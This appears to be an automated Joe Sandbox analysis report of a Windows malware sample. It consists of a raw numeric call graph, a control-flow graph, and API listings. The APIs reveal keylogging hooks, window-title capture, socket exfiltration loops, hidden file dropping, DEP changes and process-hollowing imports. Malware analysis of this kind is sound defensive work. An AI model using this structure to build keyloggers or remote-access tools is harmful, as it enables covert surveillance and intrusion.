47035->46653 47036->47035 47038 401f8e 47037->47038 47044 402325 47038->47044 47040 401fa4 47040->46657 47042 401f86 28 API calls 47041->47042 47043 406066 47042->47043 47043->46664 47045 40232f 47044->47045 47047 40233a 47045->47047 47048 40294a 28 API calls 47045->47048 47047->47040 47048->47047 47050 40250d 47049->47050 47052 40252b 47050->47052 47053 40261a 28 API calls 47050->47053 47052->46668 47053->47052 47054->46688 47055->46688 47056->46678 47057->46689 47058->46693 47059->46697 47060->46699 47063 402e85 47062->47063 47064 402e98 47063->47064 47066 402ea9 47063->47066 47067 402eae 47063->47067 47069 403445 28 API calls 47064->47069 47066->46708 47067->47066 47070 40225b 26 API calls 47067->47070 47069->47066 47070->47066 47072 404bd0 47071->47072 47075 40245c 47072->47075 47074 404be4 47074->46711 47076 402469 47075->47076 47078 402478 47076->47078 47079 402ad3 28 API calls 47076->47079 47078->47074 47079->47078 47080->46715 47081->46718 47083 401e94 47082->47083 47085 41b183 47084->47085 47086 41b168 GetCurrentProcess IsWow64Process 47084->47086 47085->46729 47086->47085 47087 41b17f 47086->47087 47087->46729 47089 412541 RegQueryValueExA RegCloseKey 47088->47089 47090 412569 47088->47090 47089->47090 47091 401f66 28 API calls 47090->47091 47092 41257e 47091->47092 47092->46732 47093->46740 47095 40b02f 47094->47095 47098 40b04b 47095->47098 47097 40b045 47097->46751 47099 40b055 47098->47099 47101 40b060 47099->47101 47102 40b138 28 API calls 47099->47102 47101->47097 47102->47101 47103->46754 47104->46757 47106 40230d 47105->47106 47107 402325 28 API calls 47106->47107 47108 401f80 47107->47108 47108->46484 47127 43a545 47109->47127 47111 43998b 47136 4392de 38 API calls 3 library calls 47111->47136 47112 439950 47112->47111 47113 439965 47112->47113 47126 40dd54 47112->47126 47134 445354 20 API calls _Atexit 47113->47134 47116 43996a 47135 43a827 26 API calls _Deallocate 47116->47135 47119 439997 47120 4399c6 47119->47120 47137 43a58a 42 API calls __Toupper 47119->47137 47121 439a32 47120->47121 47138 43a4f1 26 API calls 2 library calls 47120->47138 47139 43a4f1 26 API calls 2 library calls 47121->47139 47124 439af9 _swprintf 47124->47126 47140 445354 20 API calls _Atexit 47124->47140 47126->46499 47126->46501 47128 43a54a 47127->47128 47129 43a55d 47127->47129 47141 445354 20 API calls _Atexit 47128->47141 47129->47112 47131 43a54f 47142 43a827 26 API calls _Deallocate 47131->47142 47133 43a55a 47133->47112 47134->47116 47135->47126 47136->47119 47137->47119 47138->47121 47139->47124 47140->47126 47141->47131 47142->47133 47147 401e9b 47143->47147 47145 4027d9 47145->46796 47146->46800 47148 401ea7 47147->47148 47149 40245c 28 API calls 47148->47149 47150 401eb9 47149->47150 47150->47145 47152 409855 47151->47152 47153 4124b7 3 API calls 47152->47153 47154 40985c 47153->47154 47155 409870 47154->47155 47156 40988a 47154->47156 47158 4095cf 47155->47158 47159 409875 47155->47159 47170 4082dc 47156->47170 47158->46536 47161 4082dc 28 API calls 47159->47161 47163 409883 47161->47163 47196 409959 29 API calls 47163->47196 47165 409888 47165->47158 47166->46825 47338 402d8b 47167->47338 47169 4028dd 47169->46828 47171 4082eb 47170->47171 47197 408431 47171->47197 47173 408309 47174 4098a5 47173->47174 47202 40affa 47174->47202 47177 4098f6 47179 401f66 28 API calls 47177->47179 47178 4098ce 47180 401f66 28 API calls 47178->47180 47181 409901 47179->47181 47182 4098d8 47180->47182 47183 401f66 28 API calls 47181->47183 47184 41ae08 28 API calls 47182->47184 47185 409910 47183->47185 47186 4098e6 47184->47186 47187 41a686 79 API calls 47185->47187 47206 40a876 31 API calls ___std_exception_copy 47186->47206 47189 409915 CreateThread 47187->47189 47191 409930 CreateThread 47189->47191 47192 40993c CreateThread 47189->47192 47218 4099a9 47189->47218 47190 4098ed 47193 401eea 26 API calls 47190->47193 47191->47192 47215 409993 47191->47215 47194 401e13 26 API calls 47192->47194 47212 4099b5 47192->47212 47193->47177 47195 409950 47194->47195 47195->47158 47196->47165 47337 40999f 135 API calls 47196->47337 47198 40843d 47197->47198 47200 40845b 47198->47200 47201 402f0d 28 API calls 47198->47201 47200->47173 47201->47200 47204 40b006 47202->47204 47203 4098c3 47203->47177 47203->47178 47204->47203 47207 403b9e 47204->47207 47206->47190 47208 403ba8 47207->47208 47210 403bb3 47208->47210 47211 403cfd 28 API calls 47208->47211 47210->47203 47211->47210 47221 40a3f4 47212->47221 47270 4099e4 47215->47270 47292 409e48 47218->47292 47230 40a402 47221->47230 47222 4099be 47223 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47224 40b027 28 API calls 47223->47224 47224->47230 47227 41aca0 GetLastInputInfo GetTickCount 47227->47230 47229 40a4a2 GetWindowTextW 47229->47230 47230->47222 47230->47223 47230->47227 47230->47229 47232 401e13 26 API calls 47230->47232 47233 40a5ff 47230->47233 47234 40affa 28 API calls 47230->47234 47236 40a569 Sleep 47230->47236 47239 401f66 28 API calls 47230->47239 47240 40a4f1 47230->47240 47244 405ce6 28 API calls 47230->47244 47246 4028cf 28 API calls 47230->47246 47247 41ae08 28 API calls 47230->47247 47248 409d58 27 API calls 47230->47248 47249 401eea 26 API calls 47230->47249 47250 433519 5 API calls __Init_thread_wait 47230->47250 47251 4338a5 29 API calls __onexit 47230->47251 47252 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47230->47252 47253 4082a8 28 API calls 47230->47253 47255 40b0dd 28 API calls 47230->47255 47256 40ae58 44 API calls 2 library calls 47230->47256 47257 440c51 47230->47257 47261 404c9e 28 API calls 47230->47261 47232->47230 47235 401e13 26 API calls 47233->47235 47234->47230 47235->47222 47236->47230 47239->47230 47240->47230 47241 4082dc 28 API calls 47240->47241 47254 40a876 31 API calls ___std_exception_copy 47240->47254 47241->47240 47244->47230 47246->47230 47247->47230 47248->47230 47249->47230 47250->47230 47251->47230 47252->47230 47253->47230 47254->47240 47255->47230 47256->47230 47258 440c5d 47257->47258 47262 440a4d 47258->47262 47261->47230 47263 440a64 47262->47263 47266 440aa5 47263->47266 47268 445354 20 API calls _Atexit 47263->47268 47265 440a9b 47269 43a827 26 API calls _Deallocate 47265->47269 47266->47230 47268->47265 47269->47266 47271 409a63 GetMessageA 47270->47271 47272 4099ff SetWindowsHookExA 47270->47272 47273 409a75 TranslateMessage DispatchMessageA 47271->47273 47285 40999c 47271->47285 47272->47271 47275 409a1b GetLastError 47272->47275 47273->47271 47273->47285 47286 41ad46 47275->47286 47279 409a3e 47280 401f66 28 API calls 47279->47280 47281 409a4d 47280->47281 47282 41a686 79 API calls 47281->47282 47283 409a52 47282->47283 47284 401eea 26 API calls 47283->47284 47284->47285 47287 440c51 26 API calls 47286->47287 47288 41ad67 47287->47288 47289 401f66 28 API calls 47288->47289 47290 409a31 47289->47290 47291 404c9e 28 API calls 47290->47291 47291->47279 47293 409e5d Sleep 47292->47293 47312 409d97 47293->47312 47295 4099b2 47296 409e9d CreateDirectoryW 47301 409e6f 47296->47301 47297 409eae GetFileAttributesW 47297->47301 47298 401d64 28 API calls 47298->47301 47299 409ec5 SetFileAttributesW 47299->47301 47301->47293 47301->47295 47301->47296 47301->47297 47301->47298 47301->47299 47310 409f10 47301->47310 47325 41b58f 47301->47325 47302 409f3f PathFileExistsW 47302->47310 47304 401f86 28 API calls 47304->47310 47305 40a048 SetFileAttributesW 47305->47301 47306 401eea 26 API calls 47306->47310 47307 401eef 26 API calls 47307->47310 47308 406052 28 API calls 47308->47310 47310->47302 47310->47304 47310->47305 47310->47306 47310->47307 47310->47308 47311 401eea 26 API calls 47310->47311 47334 41b61a 32 API calls 47310->47334 47335 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47310->47335 47311->47301 47313 409e44 47312->47313 47315 409dad 47312->47315 47313->47301 47314 409dcc CreateFileW 47314->47315 47316 409dda GetFileSize 47314->47316 47315->47314 47317 409e0f CloseHandle 47315->47317 47318 409e21 47315->47318 47319 409e04 Sleep 47315->47319 47320 409dfd 47315->47320 47316->47315 47316->47317 47317->47315 47318->47313 47322 4082dc 28 API calls 47318->47322 47319->47317 47336 40a7f0 83 API calls 47320->47336 47323 409e3d 47322->47323 47324 4098a5 126 API calls 47323->47324 47324->47313 47326 41b5a2 CreateFileW 47325->47326 47328 41b5df 47326->47328 47329 41b5db 47326->47329 47330 41b5f6 WriteFile 47328->47330 47331 41b5e6 SetFilePointer 47328->47331 47329->47301 47332 41b60b CloseHandle 47330->47332 47333 41b609 47330->47333 47331->47330 47331->47332 47332->47329 47333->47332 47334->47310 47335->47310 47336->47319 47339 402d97 47338->47339 47342 4030f7 47339->47342 47341 402dab 47341->47169 47343 403101 47342->47343 47345 403115 47343->47345 47346 4036c2 28 API calls 47343->47346 47345->47341 47346->47345 47348 403b48 47347->47348 47354 403b7a 47348->47354 47351 403cbb 47358 403dc2 47351->47358 47353 403cc9 47353->46837 47355 403b86 47354->47355 47356 403b9e 28 API calls 47355->47356 47357 403b5a 47356->47357 47357->47351 47359 403dce 47358->47359 47362 402ffd 47359->47362 47361 403de3 47361->47353 47363 40300e 47362->47363 47368 4032a4 47363->47368 47367 40302e 47367->47361 47369 4032b0 47368->47369 47370 40301a 47368->47370 47374 4032b6 28 API calls 47369->47374 47370->47367 47373 4035e8 28 API calls 47370->47373 47373->47367 47381 4395ba 47375->47381 47379 412814 47378->47379 47380 4127ed RegSetValueExA RegCloseKey 47378->47380 47379->46863 47380->47379 47384 43953b 47381->47384 47383 401608 47383->46861 47385 43954a 47384->47385 47386 43955e 47384->47386 47392 445354 20 API calls _Atexit 47385->47392 47391 43955a __alldvrm 47386->47391 47394 447601 11 API calls 2 library calls 47386->47394 47388 43954f 47393 43a827 26 API calls _Deallocate 47388->47393 47391->47383 47392->47388 47393->47391 47394->47391 47396 41aab9 _Yarn ___scrt_fastfail 47395->47396 47397 401f66 28 API calls 47396->47397 47398 41ab2e 47397->47398 47398->46867 47399->46883 47401 413fb3 WSASetLastError 47400->47401 47402 413fa9 47400->47402 47401->46911 47564 413e37 35 API calls ___std_exception_copy 47402->47564 47404 413fae 47404->47401 47407 404206 socket 47406->47407 47408 4041fd 47406->47408 47410 404220 47407->47410 47411 404224 CreateEventW 47407->47411 47565 404262 WSAStartup 47408->47565 47410->46911 47411->46911 47412 404202 47412->47407 47412->47410 47414 4049b1 47413->47414 47415 40492a 47413->47415 47414->46911 47416 404933 47415->47416 47417 404987 CreateEventA CreateThread 47415->47417 47418 404942 GetLocalTime 47415->47418 47416->47417 47417->47414 47567 404b1d 47417->47567 47419 41ad46 28 API calls 47418->47419 47420 40495b 47419->47420 47566 404c9e 28 API calls 47420->47566 47422 404968 47423 401f66 28 API calls 47422->47423 47424 404977 47423->47424 47425 41a686 79 API calls 47424->47425 47426 40497c 47425->47426 47427 401eea 26 API calls 47426->47427 47427->47417 47429 4043e1 47428->47429 47430 4042b3 47428->47430 47431 404343 47429->47431 47432 4043e7 WSAGetLastError 47429->47432 47430->47431 47433 4042e8 47430->47433 47435 404cbf 28 API calls 47430->47435 47431->46911 47432->47431 47434 4043f7 47432->47434 47571 420151 27 API calls 47433->47571 47436 4042f7 47434->47436 47437 4043fc 47434->47437 47440 4042d4 47435->47440 47443 401f66 28 API calls 47436->47443 47576 41bc76 30 API calls 47437->47576 47439 4042f0 47439->47436 47442 404306 47439->47442 47444 401f66 28 API calls 47440->47444 47452 404315 47442->47452 47453 40434c 47442->47453 47446 404448 47443->47446 47447 4042e3 47444->47447 47445 40440b 47577 404c9e 28 API calls 47445->47577 47449 401f66 28 API calls 47446->47449 47450 41a686 79 API calls 47447->47450 47454 404457 47449->47454 47450->47433 47451 404418 47455 401f66 28 API calls 47451->47455 47458 401f66 28 API calls 47452->47458 47573 420f34 55 API calls 47453->47573 47459 41a686 79 API calls 47454->47459 47457 404427 47455->47457 47461 41a686 79 API calls 47457->47461 47462 404324 47458->47462 47459->47431 47460 404354 47463 404389 47460->47463 47464 404359 47460->47464 47465 40442c 47461->47465 47466 401f66 28 API calls 47462->47466 47575 4202ea 28 API calls 47463->47575 47467 401f66 28 API calls 47464->47467 47468 401eea 26 API calls 47465->47468 47469 404333 47466->47469 47471 404368 47467->47471 47468->47431 47472 41a686 79 API calls 47469->47472 47474 401f66 28 API calls 47471->47474 47486 404338 47472->47486 47473 404391 47475 4043be CreateEventW CreateEventW 47473->47475 47477 401f66 28 API calls 47473->47477 47476 404377 47474->47476 47475->47431 47479 41a686 79 API calls 47476->47479 47478 4043a7 47477->47478 47481 401f66 28 API calls 47478->47481 47482 40437c 47479->47482 47483 4043b6 47481->47483 47574 420592 53 API calls 47482->47574 47485 41a686 79 API calls 47483->47485 47487 4043bb 47485->47487 47572 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47486->47572 47487->47475 47578 41a945 GlobalMemoryStatusEx 47488->47578 47490 41a982 47490->46911 47579 413646 47491->47579 47495 40cc0d 47494->47495 47496 41246e 3 API calls 47495->47496 47498 40cc14 47496->47498 47497 40cc2c 47497->46911 47498->47497 47499 4124b7 3 API calls 47498->47499 47499->47497 47501 401f86 28 API calls 47500->47501 47502 41ae03 47501->47502 47502->46911 47503->46911 47505 436050 ___scrt_fastfail 47504->47505 47506 41ac71 GetForegroundWindow GetWindowTextW 47505->47506 47507 403b40 28 API calls 47506->47507 47508 41ac9b 47507->47508 47508->46911 47510 401f66 28 API calls 47509->47510 47511 40e69e 47510->47511 47511->46911 47513 4027f8 47512->47513 47514 402e78 28 API calls 47513->47514 47515 402814 47514->47515 47515->46911 47517 40447b 47516->47517 47620 404be8 47517->47620 47519 404490 _Yarn 47520 404507 WaitForSingleObject 47519->47520 47521 4044e7 47519->47521 47523 40451d 47520->47523 47522 4044f9 send 47521->47522 47524 404542 47522->47524 47624 42051a 55 API calls 47523->47624 47527 401eea 26 API calls 47524->47527 47526 404530 SetEvent 47526->47524 47528 40454a 47527->47528 47529 401eea 26 API calls 47528->47529 47530 404552 47529->47530 47530->46911 47532 4045ec 47531->47532 47533 43a88c ___std_exception_copy 21 API calls 47532->47533 47535 401f86 28 API calls 47532->47535 47536 404666 47532->47536 47537 401eef 26 API calls 47532->47537 47540 401eea 26 API calls 47532->47540 47545 404649 47532->47545 47630 40455b 47532->47630 47533->47532 47535->47532 47538 4047eb 98 API calls 47536->47538 47537->47532 47539 40466d 47538->47539 47541 401eea 26 API calls 47539->47541 47540->47532 47542 404676 47541->47542 47543 401eea 26 API calls 47542->47543 47544 40467f 47543->47544 47544->46911 47636 404688 32 API calls 47545->47636 47548 404805 SetEvent CloseHandle 47547->47548 47549 40481c closesocket 47547->47549 47550 40489c 47548->47550 47551 404829 47549->47551 47550->46911 47552 40483f 47551->47552 47638 404ab1 83 API calls 47551->47638 47554 404851 WaitForSingleObject 47552->47554 47555 404892 SetEvent CloseHandle 47552->47555 47639 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47554->47639 47555->47550 47557 404860 SetEvent WaitForSingleObject 47640 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47557->47640 47559 404878 SetEvent CloseHandle CloseHandle 47559->47555 47560->46911 47561->46911 47562->46911 47563->46911 47564->47404 47565->47412 47566->47422 47570 404b29 101 API calls 47567->47570 47569 404b26 47570->47569 47571->47439 47572->47431 47573->47460 47574->47486 47575->47473 47576->47445 47577->47451 47578->47490 47582 413619 47579->47582 47583 41362e ___scrt_initialize_default_local_stdio_options 47582->47583 47586 43e2dd 47583->47586 47589 43b030 47586->47589 47590 43b070 47589->47590 47591 43b058 47589->47591 47590->47591 47593 43b078 47590->47593 47613 445354 20 API calls _Atexit 47591->47613 47615 4392de 38 API calls 3 library calls 47593->47615 47594 43b05d 47614 43a827 26 API calls _Deallocate 47594->47614 47597 43b088 47616 43b7b6 20 API calls 2 library calls 47597->47616 47600 41363c 47600->46911 47601 43b100 47617 43be24 50 API calls 3 library calls 47601->47617 47603 43b10b 47618 43b820 20 API calls _free 47603->47618 47605 43b068 47606 433d2c 47605->47606 47607 433d37 IsProcessorFeaturePresent 47606->47607 47608 433d35 47606->47608 47610 4341a4 47607->47610 47608->47600 47619 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47610->47619 47612 434287 47612->47600 47613->47594 47614->47605 47615->47597 47616->47601 47617->47603 47618->47605 47619->47612 47621 404bf0 47620->47621 47625 404c0c 47621->47625 47623 404c06 47623->47519 47624->47526 47626 404c16 47625->47626 47628 404c21 47626->47628 47629 404d07 28 API calls 47626->47629 47628->47623 47629->47628 47631 404592 recv 47630->47631 47632 404565 WaitForSingleObject 47630->47632 47634 4045a5 47631->47634 47637 420556 55 API calls 47632->47637 47634->47532 47635 404581 SetEvent 47635->47634 47636->47532 47637->47635 47638->47552 47639->47557 47640->47559 47642->46970 47643->46998 47644->46997 47645->46986 47646->46992 47647->46996 47650 40e56a 47648->47650 47649 4124b7 3 API calls 47649->47650 47650->47649 47651 40e59c 47650->47651 47652 40e60e 47650->47652 47654 40e5fe Sleep 47650->47654 47653 4082dc 28 API calls 47651->47653 47651->47654 47657 41ae08 28 API calls 47651->47657 47663 401e13 26 API calls 47651->47663 47667 401f66 28 API calls 47651->47667 47670 4126d2 29 API calls 47651->47670 47681 40bf04 73 API calls ___scrt_fastfail 47651->47681 47682 412774 29 API calls 47651->47682 47655 4082dc 28 API calls 47652->47655 47653->47651 47654->47650 47658 40e619 47655->47658 47657->47651 47659 41ae08 28 API calls 47658->47659 47660 40e625 47659->47660 47683 412774 29 API calls 47660->47683 47663->47651 47664 40e638 47665 401e13 26 API calls 47664->47665 47666 40e644 47665->47666 47668 401f66 28 API calls 47666->47668 47667->47651 47669 40e655 47668->47669 47671 4126d2 29 API calls 47669->47671 47670->47651 47672 40e668 47671->47672 47684 411699 TerminateProcess WaitForSingleObject 47672->47684 47674 40e670 ExitProcess 47685 411637 60 API calls 47676->47685 47682->47651 47683->47664 47684->47674

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                  • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 384173800-625181639
                                                  • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                  • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436050 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                  APIs
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
